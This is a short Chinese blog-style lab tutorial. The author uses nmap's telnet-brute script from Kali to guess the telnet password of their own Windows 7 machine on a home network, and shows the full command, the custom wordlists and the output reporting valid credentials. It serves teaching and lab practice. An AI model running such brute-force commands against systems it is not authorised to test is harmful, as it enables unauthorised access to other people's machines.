【20171115中】nmap 使用脚本爆破telnet密码
今天老黑走出了低谷,设置了惩罚机制后效率提升了很多,现在写一个使用nmap检测目标主机漏洞和利用漏洞的文章,话不多说,直接开始!
0x01:环境介绍
主机A:系统 - kali2017,IP - 192.168.1.104
主机B:系统 - win7x64,IP - 192.168.1.103
使用主机A扫描并攻入主机B
0x02:确认主机B开启了telnet的23端口
主机B没有开启,我自己开启一下。
s1:控制面板 -> 程序 -> 打开或关闭windows程序 -> 选中下图选项框,点击确认后重启系统。
s2:确认计算机telnet服务是否已经开启。打开计算机右击 -> 管理 -> 服务和应用程序 -> 服务 -> 找到Telnet服务,并将其开启服务和设置自动
0x03:在主机A扫描确认主机B是否开启了23端口
0x04:进行爆破
s1:参考官网了解,爆破命令如下
nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s <target>
s2:制造自己的myusers.lst和mypwds.lst
老黑将自己的账号AAAA放在myusers.lst中,如下:
AAAA AA22 ASDFSA SDSDD
将自己的密码BBBB放在mypwds.lst中,如下:
BBBB
BB23
DFASDFA
SADFAA
根据主机A的环境,调整命令,如下:
nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103
s3:执行命令,等待结果
root@l:~# nmap -p 23 --script telnet-brute --script-args userdb=./userpass/myusers.lst,passdb=./userpass/mypwds.lst,telnet-brute.timeout=8s 192.168.1.103 Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-15 18:18 CST Nmap scan report for promote.cache-dns.local (192.168.1.103) Host is up (0.091s latency). PORT STATE SERVICE 23/tcp open telnet | telnet-brute: | Accounts: | AAAA:BBBB - Valid credentials |_ Statistics: Performed 6 guesses in 1 seconds, average tps: 6.0 MAC Address: XXXXXXXXXXXXX (xxxxxxxxxxxx.) Nmap done: 1 IP address (1 host up) scanned in 1.49 seconds
0x05:telnet登陆主机B,WELL DONE!